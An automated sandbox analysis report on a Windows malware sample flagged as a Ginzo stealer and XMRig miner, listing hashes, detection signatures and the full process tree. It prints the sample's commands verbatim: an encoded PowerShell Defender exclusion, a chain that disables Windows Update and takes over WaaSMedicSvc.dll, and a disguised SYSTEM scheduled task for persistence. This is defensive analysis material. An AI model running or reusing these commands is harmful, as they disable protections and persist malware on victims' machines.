Analysis
-
max time kernel
148s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-05-2022 12:32
Static task
static1
General
-
Target
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe
-
Size
171KB
-
MD5
b2983dc6d009875de6e6e97be5779db0
-
SHA1
11fd9f1b527eae215d51865dee19b3dceabd918c
-
SHA256
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b
-
SHA512
bbc86e6e5895c9ce90edde8c70178b70017891156929534d7ff7dabd0f435a0ee68863c95e888d3aaffef9efa3ac265c7e574715eb85e52c1c6ca970da546cea
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/3696-226-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/3696-228-0x000000014036DAD4-mapping.dmp xmrig behavioral1/memory/3696-229-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/3696-230-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/3696-233-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
720167.exeupdater.exepid process 4496 720167.exe 1276 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1980 takeown.exe 2808 icacls.exe 1072 takeown.exe 3764 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe -
Loads dropped DLL 7 IoCs
Processes:
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exepid process 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1980 takeown.exe 2808 icacls.exe 1072 takeown.exe 3764 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 freegeoip.app 24 freegeoip.app -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 3428 set thread context of 4908 3428 conhost.exe conhost.exe PID 3428 set thread context of 3696 3428 conhost.exe explorer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 4304 powershell.exe 4304 powershell.exe 1316 conhost.exe 3928 powershell.exe 3928 powershell.exe 3428 conhost.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeDebugPrivilege 1316 conhost.exe Token: SeShutdownPrivilege 2364 powercfg.exe Token: SeCreatePagefilePrivilege 2364 powercfg.exe Token: SeShutdownPrivilege 2664 powercfg.exe Token: SeCreatePagefilePrivilege 2664 powercfg.exe Token: SeShutdownPrivilege 3424 powercfg.exe Token: SeCreatePagefilePrivilege 3424 powercfg.exe Token: SeShutdownPrivilege 3812 powercfg.exe Token: SeCreatePagefilePrivilege 3812 powercfg.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3428 conhost.exe Token: SeShutdownPrivilege 3524 powercfg.exe Token: SeCreatePagefilePrivilege 3524 powercfg.exe Token: SeShutdownPrivilege 3100 powercfg.exe Token: SeCreatePagefilePrivilege 3100 powercfg.exe Token: SeShutdownPrivilege 4712 powercfg.exe Token: SeCreatePagefilePrivilege 4712 powercfg.exe Token: SeShutdownPrivilege 1348 powercfg.exe Token: SeCreatePagefilePrivilege 1348 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe720167.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1112 wrote to memory of 4496 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 720167.exe PID 1112 wrote to memory of 4496 1112 557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe 720167.exe PID 4496 wrote to memory of 1316 4496 720167.exe conhost.exe PID 4496 wrote to memory of 1316 4496 720167.exe conhost.exe PID 4496 wrote to memory of 1316 4496 720167.exe conhost.exe PID 1316 wrote to memory of 4456 1316 conhost.exe cmd.exe PID 1316 wrote to memory of 4456 1316 conhost.exe cmd.exe PID 4456 wrote to memory of 4304 4456 cmd.exe powershell.exe PID 4456 wrote to memory of 4304 4456 cmd.exe powershell.exe PID 1316 wrote to memory of 4536 1316 conhost.exe cmd.exe PID 1316 wrote to memory of 4536 1316 conhost.exe cmd.exe PID 1316 wrote to memory of 4556 1316 conhost.exe cmd.exe PID 1316 wrote to memory of 4556 1316 conhost.exe cmd.exe PID 4536 wrote to memory of 4704 4536 cmd.exe sc.exe PID 4536 wrote to memory of 4704 4536 cmd.exe sc.exe PID 4536 wrote to memory of 2560 4536 cmd.exe sc.exe PID 4536 wrote to memory of 2560 4536 cmd.exe sc.exe PID 4556 wrote to memory of 2364 4556 cmd.exe powercfg.exe PID 4556 wrote to memory of 2364 4556 cmd.exe powercfg.exe PID 4536 wrote to memory of 2484 4536 cmd.exe sc.exe PID 4536 wrote to memory of 2484 4536 cmd.exe sc.exe PID 4556 wrote to memory of 2664 4556 cmd.exe powercfg.exe PID 4556 wrote to memory of 2664 4556 cmd.exe powercfg.exe PID 4536 wrote to memory of 4740 4536 cmd.exe sc.exe PID 4536 wrote to memory of 4740 4536 cmd.exe sc.exe PID 4556 wrote to memory of 3424 4556 cmd.exe powercfg.exe PID 4556 wrote to memory of 3424 4556 cmd.exe powercfg.exe PID 4536 wrote to memory of 4012 4536 cmd.exe sc.exe PID 4536 wrote to memory of 4012 4536 cmd.exe sc.exe PID 4556 wrote to memory of 3812 4556 cmd.exe powercfg.exe PID 4556 wrote to memory of 3812 4556 cmd.exe powercfg.exe PID 4536 wrote to memory of 2292 4536 cmd.exe sc.exe PID 4536 wrote to memory of 2292 4536 cmd.exe sc.exe PID 1316 wrote to memory of 4888 1316 conhost.exe cmd.exe PID 1316 wrote to memory of 4888 1316 conhost.exe cmd.exe PID 4536 wrote to memory of 1548 4536 cmd.exe sc.exe PID 4536 wrote to memory of 1548 4536 cmd.exe sc.exe PID 4536 wrote to memory of 3764 4536 cmd.exe sc.exe PID 4536 wrote to memory of 3764 4536 cmd.exe sc.exe PID 4888 wrote to memory of 1976 4888 cmd.exe schtasks.exe PID 4888 wrote to memory of 1976 4888 cmd.exe schtasks.exe PID 4536 wrote to memory of 4652 4536 cmd.exe sc.exe PID 4536 wrote to memory of 4652 4536 cmd.exe sc.exe PID 4536 wrote to memory of 1392 4536 cmd.exe sc.exe PID 4536 wrote to memory of 1392 4536 cmd.exe sc.exe PID 4536 wrote to memory of 4020 4536 cmd.exe sc.exe PID 4536 wrote to memory of 4020 4536 cmd.exe sc.exe PID 4536 wrote to memory of 2152 4536 cmd.exe sc.exe PID 4536 wrote to memory of 2152 4536 cmd.exe sc.exe PID 4536 wrote to memory of 1268 4536 cmd.exe sc.exe PID 4536 wrote to memory of 1268 4536 cmd.exe sc.exe PID 4536 wrote to memory of 3328 4536 cmd.exe sc.exe PID 4536 wrote to memory of 3328 4536 cmd.exe sc.exe PID 4536 wrote to memory of 452 4536 cmd.exe sc.exe PID 4536 wrote to memory of 452 4536 cmd.exe sc.exe PID 4536 wrote to memory of 1980 4536 cmd.exe takeown.exe PID 4536 wrote to memory of 1980 4536 cmd.exe takeown.exe PID 4536 wrote to memory of 2808 4536 cmd.exe icacls.exe PID 4536 wrote to memory of 2808 4536 cmd.exe icacls.exe PID 4536 wrote to memory of 2332 4536 cmd.exe reg.exe PID 4536 wrote to memory of 2332 4536 cmd.exe reg.exe PID 4536 wrote to memory of 4688 4536 cmd.exe reg.exe PID 4536 wrote to memory of 4688 4536 cmd.exe reg.exe PID 4536 wrote to memory of 1420 4536 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe"C:\Users\Admin\AppData\Local\Temp\557b36d84494dbe4e0a20ac3ecdfbdf0a47a10255724d37313fc7a25aea2260b.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\720167.exe"C:\Users\Admin\AppData\Local\720167.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\720167.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
-
C:\Windows\system32\sc.exesc stop bits8⤵
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe7⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==7⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\720167.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\720167.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
443B
MD58add56521ef894ef0c66ecd3e989d718
SHA12058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
